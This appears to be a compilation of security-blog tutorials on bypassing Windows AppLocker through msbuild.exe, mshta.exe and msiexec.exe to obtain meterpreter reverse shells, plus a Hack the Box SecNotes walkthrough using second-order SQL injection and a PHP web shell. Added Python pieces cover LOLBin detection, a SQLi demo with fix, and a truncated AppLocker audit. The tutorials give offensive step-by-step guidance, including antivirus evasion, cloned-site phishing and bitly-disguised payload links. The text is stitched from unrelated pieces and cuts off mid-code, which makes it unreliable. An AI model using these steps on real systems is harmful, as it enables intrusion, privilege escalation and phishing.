Bypass Application Whitelisting using msbuild.exe (Multiple Methods)

The purpose of this post is to demonstrate the most common and familiar techniques for bypassing AppLocker application whitelisting. As we know, for security reasons the system admin adds group policies to restrict app execution for local users. In our previous article, “Windows Applocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies with MSBuild.exe.

Table of Content

Introduction to MSbuild.exe

Exploiting Techniques

  • Generate CSharp file with Msfvenom
  • Generate XML file to Exploit MSbuild
  • Nps_payload Script
  • Powershell Empire
  • GreatSCT

Introduction to MSbuild.exe

The Microsoft Build Engine is a platform for building applications. This engine, which is also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. Visual Studio uses MSBuild, but it doesn’t depend on Visual Studio. By invoking msbuild.exe on your project or solution file, you can organize and build products in environments where Visual Studio isn’t installed.

Visual Studio uses MSBuild to load and build managed projects. The project files in Visual Studio (.csproj, .vbproj, .vcxproj, and others) contain MSBuild XML code.

Exploiting Techniques:

Generate CSharp file with Msfvenom

Microsoft Visual Studio creates C# (C Sharp) projects as *.csproj files saved in MSBuild format, so that the MSBuild platform can compile them into an executable program.

With the help of a malicious build we can obtain a reverse shell from the victim’s machine. So now we will generate our file.csproj, and for that we first generate C# shellcode with msfvenom. That shellcode is then placed in file.csproj as shown below.

The shellcode above should be placed in the XML file, which you can download from GitHub; it contains the code that MSBuild compiles and executes. This XML file should be saved as file.csproj and must be run via MSBuild to get a Meterpreter session.

Note: Replace the shellcode value with your C# shellcode and then rename buf to shellcode as shown in the image below.

You can run MSBuild from Visual Studio, or from the Command Window. By using Visual Studio, you can compile an application to run on any one of several versions of the .NET Framework. For example, you can compile an application to run on the .NET Framework 2.0 on a 32-bit platform, and you can compile the same application to run on the .NET Framework 4.5 on a 64-bit platform. The ability to compile to more than one framework is named multitargeting.

To know more about MSbuild read from here: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2015

Now launch multi/handler to get a meterpreter session and run file.csproj with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

Note: you need to save your malicious payload (XML / csproj) at this location:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\ and then execute this file from the command prompt.

As you can see, we have a meterpreter session on the victim, as shown below:

Generate XML file to Exploit MSbuild

As said above, MSBuild uses an XML-based project file format that is straightforward and extensible, so we can rename the file.csproj generated above to file.xml and again run file.xml with msbuild.exe from the target path C:\Windows\Microsoft.Net\Framework\v4.0.30319 as shown.

As you can see, we again have a meterpreter session on the victim, as shown below:

Nps_Payload Script

This script generates payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources. It was written by Larry Spohn (@Spoonman1091); the payload was written by Ben Mauch (@Ben0xA) aka dirty_ben. You can download it from GitHub.

Nps_payload generates payloads that can be executed with msbuild.exe and mshta.exe to get a reverse connection from the victim’s machine via a meterpreter session.

Follow the steps below to generate a payload:

  1. Run ./nps_payload.py script, once you have downloaded nps payload from github.
  2. Press key 1 to select task “generate msbuild/nps/msf”
  3. Again Press key 1 to select payload “windows/meterpreter/reverse_tcp”

This will generate the payload as an XML file. Copy this file to the target location C:\Windows\Microsoft.Net\Framework\v4.0.30319 as done in the previous method, and at the same time run the command below in a new terminal to start the listener.

Now repeat the steps above to execute msbuild_nps.xml from the command prompt and obtain a reverse connection via meterpreter as shown below:

PowerShell Empire

For our next msbuild attack method, we will use Empire. Empire is a post-exploitation framework. So far we have paired our XML attacks with Metasploit, but in this method we will use the Empire framework. It is a pure-Python PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listener to check whether there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener, type:

With the above commands you will have an active listener. Type back to leave the listener menu so that you can set up the PowerShell stager.

For our MSBuild attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this, type:

usestager will create a malicious code file that is saved in /tmp as launcher.xml.

Once the file runs, we will see the result on our listener. Run the file on the victim’s machine by typing the following command:

To see whether we have any session open, type ‘agents’. Doing so will show you the name of the session you have. To access that session, type:

The above command will give you access to the session.

GreatSCT

GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most antivirus products. GreatSCT is currently maintained by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it is downloaded and running, type the following command to access the modules:

Now, to see the list of payloads, type:

From the list of payloads you can choose any one for your desired attack, but for this attack we will use:

Once the command is executed, type:

When generating the payload, it will ask you to give a name for the payload. By default it will use ‘payload’ as the name. We gave msbuild as the payload name; the output code is saved as XML.

Now it has made two files: a Metasploit RC file and an msbuild.xml file.

First, start the Python HTTP server in /usr/share/greatsct-output/source by typing:

Run the file on the victim’s machine by typing the following command:

Simultaneously, start the multi/handler using resource file. For this, type :

And voila! We have meterpreter session as shown here.

Reference: https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild?view=vs-2017

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Bypass Application Whitelisting using mshta.exe (Multiple Methods)

Today we are going to learn about different methods of HTA attack. HTA is a useful and important attack because it can bypass application whitelisting. In our previous article, “Windows Applocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies with mshta.exe.

Knowing different methods for the same attack always comes in handy.

Table of content:

  • Introduction
  • Importance of HTA
  • Different methods
  • Conclusion

Introduction

For a long time, HTA files have been used as part of drive-by web attacks or as droppers for malware in the wild. This includes something as basic as redirecting mobile clients and telling them that the website does not yet have mobile support. HTA files are well known in cybersecurity, from both the red-team and blue-team perspectives, as one of those “retro” ways of bypassing application whitelisting.

Mshta.exe runs the Microsoft HTML Application Host, the Windows utility responsible for running HTA (HTML Application) files. These are HTML files that can run JavaScript or VBScript, and you can execute them with the Microsoft mshta.exe tool.

Importance

Using .htaccess files or other strategies to redirect based on browser type will help increase success rates when using HTA files for web-based attacks. There is a lot of flexibility inside an HTA file; you can easily make it look like an Adobe updater, a secure document viewer, and a number of other things. It would also be useful to serve the HTA file over HTTPS, limiting detection rates for companies not using some form of SSL interception/termination. HTA files help bypass antivirus since they are still not well detected. Last but not least, HTA can also be used in web phishing, replacing the old Java Applet attack.

Methods

There are multiple methods for an HTA attack, and we are going to shed light on almost all of them. The methods we are going to study are:

  • Metasploit
  • Setoolkit
  • Magic unicorn
  • Msfvenom
  • Empire
  • CactusTorch
  • Koadic
  • Great SCT

Metasploit

Our first method is to use a built-in exploit module in Metasploit. For this, go to the terminal in your Kali and type:

msfconsole

Metasploit contains the “HTA Web Server” module, which generates a malicious .hta file. This module hosts an HTML Application (HTA) that, when opened, will run a payload via PowerShell. When a user navigates to the HTA file they will be prompted by IE twice before the payload is executed. Once Metasploit has started, type:

Once the exploit is executed, it will give you a URL ending in .hta. At the same time, Metasploit starts the server that serves the file. This link you then have to run on your victim’s PC using the following command:

The usual file extension of an HTA is .hta. We use the above command because an HTA is treated like an executable file with the .exe extension and hence is executed via mshta.exe. When the HTA is launched by mshta.exe, it runs under a signed Microsoft binary, allowing you to call PowerShell and inject a payload directly into memory.

Once the above command is executed you will have a session open. To access the session, type:

Thus, you will have your meterpreter session.

Setoolkit

Our next method for the HTA attack is through setoolkit. For this, open setoolkit in your Kali, and from the menu choose the first option by typing 1 to access the social engineering tools.

From the next menu, choose the second option by typing 2 to go into the website attack vectors.

From the next menu choose option 8 to select the HTA attack method.

Once you have selected option 8 for the HTA attack, you next need to select option 2, which will allow you to clone a site. Once option 2 is selected, it will ask for the URL of the site you want to clone. Provide the desired URL; here we have given ‘www.ignitetechnologies.in’.

After giving the URL it will ask you to select the type of meterpreter you want. Select the third one by typing 3.

Once you hit enter after typing 3, the process will start and you will have the handler (multi/handler).

Now convert your malicious IP into a bitly link, which will look more genuine to victims when you share it with them.

When the victim browses the malicious link above, the file will be saved and automatically executed on the victim’s PC, as shown in the image below:

Then you will have your meterpreter session. You can use the command ‘sysinfo’ to get basic information about the victim’s PC.

Magic Unicorn

Next method for HTA attack is using unicorn third party tool. The tool magic unicorn is developed by Dave Kennedy. It is a user friendly tool which allows us to perform HTA attack by injecting shellcode straight into memory. The best part of this tool is that it’s compatible with Metasploit, along with shellcode and cobalt strike. You can have detailed look of the software at: trustedsec.com, and you can download the software from github or just by using this link: https://github.com/trustedsec/unicorn

Once you have downloaded magic unicorn, open it in the terminal of Kali and type:

Executing the above command will start the process of creating an .hta file. The said .hta file will be created in a folder named hta-attack/. Go into that folder and see the list of files created by typing the following commands:

Now you will be able to see an .hta file, i.e. Launcher.hta. Start the Python server so the file can be shared. To do so, type:

Once the server is up and running execute the following command in the cmd prompt of the victim’s PC :

When the above command will be executed, you will have your session activated in the multi/handler. To access the session, type :

MSFVenom

The next method of HTA attack is to manually create an .hta file with msfvenom. To create the .hta file, type the following command in the terminal of Kali:

Executing the above command will create an .hta file which you can use to your advantage. After creating the file, turn on the Python server to share the file with the victim’s PC by typing:

Run the above file by typing:

Simultaneously, start your handler to receive a session when you run the above file in the victim’s cmd prompt. To start multi/handler, type:

And so, using such an easy method, you will have your meterpreter session. You can use sysinfo to learn the basics of the victim’s PC.

PowerShell Empire

For our next HTA attack method, we will use Empire. Empire is a post-exploitation framework. So far we have paired our HTA attacks with Metasploit, but in this method we will use the Empire framework. It is a pure-Python PowerShell Windows agent, which makes it quite useful. Empire is developed by @harmj0y, @sixdub, @enigma0x3, rvrsh3ll, @killswitch_gui, and @xorrior. You can download this framework from https://github.com/EmpireProject/Empire.

To have a basic guide of Empire, please visit our article introducing empire:

https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/

Once the Empire framework is started, type listener to check whether there are any active listeners. As you can see in the image below, there are no active listeners. So, to set up a listener, type:

With the above commands you will have an active listener. Type back to leave the listener menu so that you can set up the PowerShell stager.

For our HTA attack we will use a stager. A stager, in Empire, is a snippet of code that allows our malicious code to be run via the agent on the compromised host. So, for this, type:

usestager will create a malicious code file that is saved in the outfile named 1.hta. Once the file runs, we will see the result on our listener. Run the file on the victim’s machine by typing the following command:

To see whether we have any session open, type ‘agents’. Doing so will show you the name of the session you have. To access that session, type:

The above command will give you access to the session.

Cactustorch

CactusTorch is a framework for JavaScript and VBScript shellcode launchers. It is developed by Vincent Yiu. This tool can bypass many common defences, which is an advantage for us. The major thing to note is that the code we use in CactusTorch is made with msfvenom and then encoded in Base64, as that is the only format it supports.

So, to start, let’s first make our malware and then encode it.

Now, to encode the file, type:

Copy the base64 code as it is to be used later.

Now that we have our malware ready, let’s download cactustorch. You can download it from here:

https://github.com/mdsecactivebreach/CACTUSTORCH

Once it is installed, type the following to see the contents of the installed folder:

The above command will start CactusTorch for the HTA attack.

Once CactusTorch starts, paste the Base64 code copied earlier at the highlighted space, as shown in the image below.

Now that we have added our code, let’s execute the file on our victim’s PC by typing:

Simultaneously, start your multi/handler to receive a session. For multi/handler type:

Once you execute the file in victim’s PC, you will have your session.

Koadic

Our next method uses Koadic. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. To know more about Koadic, please read our detailed article on the framework at this link: https://www.hackingarticles.in/koadic-com-command-control-framework

Once Koadic is up and running, type info to get the gist of the details you need to provide in order to get a session. From info you know that you need to provide srvhost along with setting the endpoint. So, to set them, type:

Execute the file on your victim’s PC by typing:

And you will have a session up and running. To know the name of session type:

And now to access the session type:

GreatSCT

GreatSCT is a tool that allows you to use Metasploit exploits and lets them bypass most antivirus products. GreatSCT is currently maintained by @ConsciousHacker. You can download it from here: https://github.com/GreatSCT/GreatSCT

Once it is downloaded and running, type the following command to access the modules:

Now, to see the list of payloads, type:

From the list of payloads you can choose any one for your desired attack, but for this attack we will use:

Once the command is executed, type:

After executing generate command, it asks you which method you want to use. As we are going to use msfvenom type 1 to choose first option. Then press enter for meterpreter. Then provide lhost and lport i.e. 192.168.1.107 and 4321 respectively.

When generating the shellcode, it will ask you to give a name for the payload. By default it will use ‘payload’ as the name. As I did not want to give a name, I simply pressed enter.

Now it has made two files: a resource file and an .hta file.

First, start the Python HTTP server in /usr/share/greatsct-output by typing:

Now execute the hta file in the command prompt of the victim’s PC.

Simultaneously, start the multi/handler using the resource file. For this, type:

And voila! You have your session.

Conclusion

So basically, this simple HTA attack gives full access to the remote attacker. An attacker can create a malicious application for the Windows operating system using web technologies, for example by cloning a site. In a nutshell, it performs PowerShell injection through HTA files, which can be used for Windows-based PowerShell exploitation through the browser. The above are the methods used for the attack. As they say, if one door closes another opens; so learning the same attack through different ways is often convenient.
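Added here as a defender's counterpart to the msbuild.exe and mshta.exe methods described in the two articles above (this is not code from the original posts): a small set of detection rules run over constructed Sysmon-style process-creation records. The record format, the allow-list of legitimate build-tool parents and every sample line are assumptions made for the example.

```python
"""Detect the msbuild.exe and mshta.exe execution patterns described above.

Added example, not code from the original posts. It runs detection rules over
constructed Sysmon Event ID 1 style lines (Image, CommandLine, ParentImage).
The line format, the parent allow-list and all sample lines are assumptions.
"""
import ntpath
import re
from typing import Dict, List, Tuple

# Parents under which msbuild.exe is expected in a developer context (assumed list).
BUILD_TOOL_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
PROJECT_RE = re.compile(r"\S+\.(?:csproj|vbproj|vcxproj|proj|xml)\b", re.IGNORECASE)

# Constructed sample telemetry: one event per line, fields separated by " | ".
SAMPLE_LOG = r"""
Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | CommandLine=MSBuild.exe file.csproj | ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | CommandLine=MSBuild.exe file.xml | ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | CommandLine=MSBuild.exe /nologo C:\src\App\App.csproj | ParentImage=C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe
Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe http://192.0.2.10:8080/launcher.hta | ParentImage=C:\Windows\System32\cmd.exe
Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe C:\Users\bob\Downloads\1.hta | ParentImage=C:\Windows\explorer.exe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine=powershell.exe -nop -w hidden | ParentImage=C:\Windows\System32\mshta.exe
Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe | ParentImage=C:\Windows\explorer.exe
""".strip().splitlines()


def parse_event(line: str) -> Dict[str, str]:
    """Split 'Key=Value | Key=Value' into a dict; values may contain ':' and '\\'."""
    fields = {}
    for chunk in line.split(" | "):
        key, _, value = chunk.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def evaluate(ev: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (rule_name, severity) pairs that fire for one process-creation event."""
    image = ntpath.basename(ev.get("Image", "")).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    cmdline = ev.get("CommandLine", "")
    findings = []
    if image == "msbuild.exe":
        # The articles run MSBuild from cmd.exe; a build tool outside the IDE/SDK chain is suspect.
        if parent not in BUILD_TOOL_PARENTS:
            findings.append(("msbuild_outside_build_tooling", "high"))
        # A project file named *.xml (file.xml above) is not how developers invoke MSBuild.
        match = PROJECT_RE.search(cmdline)
        if match and match.group(0).lower().endswith(".xml"):
            findings.append(("msbuild_xml_project", "medium"))
    if image == "mshta.exe":
        if URL_RE.search(cmdline):
            findings.append(("mshta_remote_hta", "high"))      # mshta.exe http://.../x.hta
        elif "\\users\\" in cmdline.lower():
            findings.append(("mshta_user_writable_hta", "medium"))  # .hta from a profile folder
    # Both LOLBins end up launching PowerShell or another interpreter in these attacks.
    if parent in {"msbuild.exe", "mshta.exe"} and image in SHELLS:
        findings.append(("lolbin_spawned_shell", "high"))
    return findings


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map each rule that fired to the command lines that triggered it."""
    report: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        for rule, _severity in evaluate(ev):
            report.setdefault(rule, []).append(ev["CommandLine"])
    return report


if __name__ == "__main__":
    for rule, hits in scan(SAMPLE_LOG).items():
        print(rule)
        for cmd in hits:
            print("   ", cmd)
```

Scoping the rules to parent/child relationships is what keeps legitimate Visual Studio builds out of the results, as the third sample line shows.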

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. Contact here

Hack the Box: SecNotes Walkthrough

Today we are going to solve another CTF challenge, “SecNotes”. SecNotes is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodology:

  1. Scanning Network
  • TCP and UDP ports scanning (Nmap).
  2. Testing port 80
  • Exploiting 2nd order SQL injection on sign up form.
  • Retrieving all the notes in the system.
  • Retrieving “tyler’s” account password.
  3. SMB (port 445) penetration
  • Accessing victim shell using smbclient.
  • Uploading simple-backdoor.php on victim’s machine.
  • Triggering backdoor via browser.
  • Exploiting newly created RCE using metasploit’s smb_delivery exploit.
  • Reading user.txt flag.
  4. Privilege Escalation
  • Discovering a Windows Subsystem for Linux (WSL).
  • Obtaining bash shell from bash.exe.
  • Reading administrator password from bash_history.
  • Connecting to Administrator using SMB.
  • Reading root.txt flag.

Without any further ado, let’s dive right into it.

First step as always is to perform an nmap scan. We performed an all ports system scan here.

That told us there are three ports open:

  • 80 - web server
  • 445 - SMB server
  • 8808 - web server

We launched the website on port 80 only to discover a login form.

After playing around with the page sources and source code checking we didn’t find anything useful.

But there was a sign up option too. We signed up using a random name and password and it seemed to lead us to an account where you could take notes and delete them and also change password.

We tried inserting SQL injection queries in the login form and nothing showed up. Then we tried second-order SQL injection, which is nothing but inserting SQL injection queries on the sign-up form itself, hoping that the server-side script shows unusual behavior and reveals some database information.

According to PortSwigger: “Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way.”

The query that we used was:

It hit successfully and opened up a user account. It seemed the heading was causing this second-order SQLi vulnerability. But it served our purpose and gave us three notes from the database. The third one had something that looked like the username and password of a service.

Tyler seems to be a person responsible for people’s queries. After obtaining Tyler’s password the first guess was logging into SMB server running on port 445.

For the purpose we used smbclient. Once we successfully logged into the system we listed the directories using ls command.

This seems like a different website than the one on port 80. Maybe this is the one on port 8808.

So we uploaded a PHP RCE payload called “simple-backdoor.php”, which is present in Kali Linux in the directory “/usr/share/webshells/php”, using the put command in the smb shell. This allows us to run Windows commands remotely on the server.

It was now time to trigger the backdoor we just uploaded to check if RCE is even working or not on the server.

It seems to be working just fine! Now on a new window in the terminal we run metasploit.

We are looking for an exploit called smb_delivery that triggers RCE on windows and gives a meterpreter session.

This is only one of the multiple ways through which you could exploit SMB. You can explore multiple ways to do so in our article (SMB penetration testing (Port 445)) here.

So essentially what happens here is that after setting LHOST and SRVHOST, msf generates a one-liner that we will run through the RCE vulnerability; it will trigger and give us meterpreter.

Here, 10.10.14.9 is my local IP.

Alright, so we did as Metasploit asked and ran the rundll32.exe command in the browser where we had the RCE vulnerability.

Side by side, we checked our terminal and we had gained a meterpreter session! To confirm we are in the windows server we ran sysinfo and pwd to check the current directory we are in.

After playing around a while in the machine, we found user.txt on Tyler’s desktop! But we are only half done till now with no clue where to proceed ahead. Although, a file called bash.lnk caught our attention which is a link to bash and this is weird. What is a bash file doing on windows system? We proceeded to download the link file on our system and read what’s in it.

The link file seemed quite unreadable, so we used the strings command to read bash.lnk, which eventually revealed a path to bash.exe!

We thought the path to bash.exe was C:\Windows\System32\bash.exe but it was not! The file was missing from the path. We didn’t want to traverse the whole system manually so instead we used the where command.

The where command gave us the exact directory of bash.exe and, after executing it, we received an improper TTY of bash!

We used the Python one-liner to spawn a proper TTY and proceeded to read bash_history.

It told us in clear text about a user Administrator and its password!

It is now obvious that we have to log in as Administrator using the smbclient command we found in bash_history to get an admin SMB shell!

Final steps: we traversed to the Administrator’s desktop and downloaded root.txt using smb’s “get” command. And there it was, the final flag!
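The store-then-reuse pattern behind the sign-up form bug, as an added example (not the box's real application, and not the query used in the walkthrough): a constructed schema where the sign-up insert is already parameterized, but a later notes lookup splices the stored username into SQL, shown beside the parameterized fix. The table layout, the seeded notes and the test username are all constructed.

```python
"""Second-order SQL injection as described for SecNotes, beside the fix.

Added example, not the box's application. Schema, notes, users and the
injected username are constructed; the point is that user-supplied data is
stored safely and only later used unsafely.
"""
import sqlite3
from typing import Callable, List, Optional, Tuple

Note = Tuple[str, str]


def setup() -> sqlite3.Connection:
    """In-memory database with notes belonging to two constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT);
        CREATE TABLE notes(id INTEGER PRIMARY KEY, username TEXT, title TEXT, body TEXT);
        INSERT INTO notes(username, title, body) VALUES
            ('tyler', 'todo',  'rotate service passwords'),
            ('tyler', 'creds', 'CONSTRUCTED-SECRET, not the real box value'),
            ('alice', 'list',  'milk, eggs');
        """
    )
    return conn


def signup(conn: sqlite3.Connection, username: str, password: str) -> None:
    # The sign-up form uses a parameterized INSERT, so first-order injection
    # fails here: whatever the user typed is stored verbatim, quotes included.
    conn.execute("INSERT INTO users(username, password) VALUES (?, ?)", (username, password))
    conn.commit()


def notes_vulnerable(conn: sqlite3.Connection, username: str) -> List[Note]:
    # Second-order bug: the username now comes from the database, is trusted
    # as "internal" data, and is spliced straight into the next query.
    query = f"SELECT title, body FROM notes WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def notes_fixed(conn: sqlite3.Connection, username: str) -> List[Note]:
    # Fix: bind the value regardless of where it came from; the quote in the
    # stored username is then just data and matches no one's notes.
    return conn.execute("SELECT title, body FROM notes WHERE username = ?", (username,)).fetchall()


def login_and_list(conn: sqlite3.Connection, username: str, password: str,
                   fetch: Callable[[sqlite3.Connection, str], List[Note]]) -> Optional[List[Note]]:
    """Authenticate, then list notes with the supplied lookup implementation."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?", (username, password)
    ).fetchone()
    if row is None:
        return None
    return fetch(conn, row[0])  # row[0] is the stored (attacker-controlled) username


if __name__ == "__main__":
    db = setup()
    tautology = "' OR 1=1 -- "            # constructed sign-up username
    signup(db, tautology, "pw")
    print("vulnerable:", login_and_list(db, tautology, "pw", notes_vulnerable))
    print("fixed:     ", login_and_list(db, tautology, "pw", notes_fixed))
```

The vulnerable lookup returns every note in the table for the crafted account, while the parameterized version returns none, which is the behaviour the walkthrough exploited and the behaviour a code review should look for.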

Hope you enjoyed this walkthrough. Do leave a comment with your thoughts and have a nice day!

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

Bypass Application Whitelisting using msiexec.exe (Multiple Methods)

In our previous article, “Windows Applocker Policy – A Beginner’s Guide”, we discussed how AppLocker rules define your application control policies and how to work with them. Today you will learn how to bypass AppLocker policies. In this post, we have blocked cmd.exe using a Windows AppLocker policy and try to bypass this restriction to get a command prompt as administrator.

Table of Content

Associated file formats where Applocker is applicable

Challenge 1: – Bypass Applocker with .msi file to get CMD

Little-Bit more about MSI file

Multiple Methods to get CMD

  • Generate malicious .msi file with Msfvenom -1st Method
  • Generate malicious .msi file with Msfvenom -2nd Method
  • Generate malicious .msi file with Msfvenom -3rd Method

Challenge 2: – Make a local user member of Administrative Group

  • Generate Malicious .msi file with Msfvenom -4th Method

Associated file formats where Applocker is Applicable

Windows AppLocker is a feature that was introduced in Windows 7 and Windows Server 2008 R2 as a method to restrict the use of unwanted programs. With it an administrator can restrict the execution of the following programs:

It depends entirely on the system admin which program or script he wants to set the AppLocker policy for. There could be a situation where Command Prompt (cmd.exe), PowerShell, DLL files, batch files, rundll32.exe, regsvr32, regasm and many more are blocked.

Challenge 1: – Bypass Applocker with .msi file to get CMD

Let’s suppose you are in a situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction.

Then how will you use an msi file to bypass these restrictions and get a full-privilege shell?

Little-Bit more about MSI file

The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. A file with the .msi extension is a Windows Installer package. An installation package contains all the information required to install or uninstall an application by Windows Installer. Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.

The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.

The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.

When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click an .msi file, Msiexec.exe runs with that file.

Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.

Multiple Methods to get CMD

Generate Malicious .msi file with Msfvenom -1st Method

Now let’s open a new terminal in the Kali machine and generate a malicious MSI package file as cmd.msi to get a command prompt through it, using the windows/exec payload as follows:

Now transfer cmd.msi to your Windows machine to obtain a command prompt shell as administrator. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded the .msi file on your local machine (Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe inside the Run prompt.

Syntax: msiexec /quiet /i <path of downloaded .msi file>

As soon as you hit the above command inside the Run prompt, you will get the Command Prompt.


Generate Malicious .msi file with Msfvenom -2nd  Method

Note: Even if you rename cmd.msi to another extension, it will bypass the rule and start a command prompt as administrator.

Repeat the above to generate an msi file with the same msfvenom payload, named cmd.png. Since I already have a cmd.msi file in my Kali, I rename it cmd.png and use a Python server to transfer it.

Once you have downloaded the cmd.png file (which is actually an .msi file) on your local machine (Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe inside the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

As soon as you hit the above command inside the Run prompt, you will get the Command Prompt.

Generate Malicious .msi file with Msfvenom -3rd  Method

In the above methods we obtained a command prompt using the windows/exec payload, but now we will use the windows/meterpreter/reverse_tcp payload to get a full-privilege command shell via a meterpreter session.

Now again transfer shell.msi to your Windows machine to obtain a command prompt shell as administrator, and start multi/handler. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded shell.msi on your local machine (Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe inside the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

As soon as you hit the above command inside the Run prompt, you will get the Command Prompt as administrator via the meterpreter session using this exploit!!

Challenge 2: – Make a local user member of Administrators Group

Let’s suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer files, i.e. the .msi extension, are allowed to run without any restriction.

Then how will you use an msi file to bypass these restrictions and make a local user a member of the Administrators group when cmd.exe is blocked?

Note: Here aaru is a local user account that is a non-administrative account, as shown below:

As we know, due to the AppLocker execution rule policy, cmd.exe is blocked on the local machine, so we cannot use the command prompt to add aaru to the Administrators group.

Generate Malicious .msi file with Msfvenom -4th  Method

Generate an MSI package as admin.msi with the windows/exec payload that carries a command instructing the target machine to add local admin privileges for the user “aaru”.

Now transfer admin.msi to your Windows machine to add aaru to the Administrators group. Here we have used the Python HTTP server to share the file over the network.

Once you have downloaded admin.msi on your local machine (Windows OS where cmd.exe is blocked by the admin), you can use the following syntax to run the .msi file with msiexec.exe inside the Run prompt.

Syntax: msiexec /q /i <path of downloaded .msi file>

As soon as you hit the above command inside the Run prompt, you can confirm that the aaru user has become part of the Administrators group.

Hopefully it is now clear how you can use an .msi file to compromise an operating system where cmd.exe and other applications are blocked by the administrator.
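The common thread of the msbuild.exe, mshta.exe and msiexec.exe articles above is that the blocked program is not the one being executed: a signed Windows binary that the policy allows does the work. Added as an example (not code from the articles or from Microsoft): a simplified model of AppLocker executable path-rule evaluation that audits a constructed default-style policy for those three binaries and then the same policy with explicit deny rules. The modelled semantics are deliberately reduced (deny beats allow, a rule applies only to the SID it names, '*' matches any characters, an enforced collection implicitly denies the rest); the rule Ids, policies and paths are constructed and should be verified against a real policy in audit mode.

```python
"""Audit an AppLocker Exe rule collection for the LOLBins discussed above.

Added example, not the articles' code and not Microsoft's engine: a reduced
model of AppLocker path-rule evaluation. Policies, rule Ids, SIDs assigned to
the test user and the paths checked are all constructed for illustration.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Set, Tuple

PATH_VARS = {"%SYSTEM32%": r"C:\Windows\System32", "%WINDIR%": r"C:\Windows",
             "%PROGRAMFILES%": r"C:\Program Files", "%OSDRIVE%": "C:"}
EVERYONE = "S-1-1-0"             # well-known SID for Everyone
ADMINISTRATORS = "S-1-5-32-544"  # well-known SID for BUILTIN\Administrators

# Policy 1: rules shaped like AppLocker's default executable rules. Everything under
# the Windows folder is allowed, which is exactly why the LOLBins above run.
DEFAULT_LIKE_POLICY = r"""
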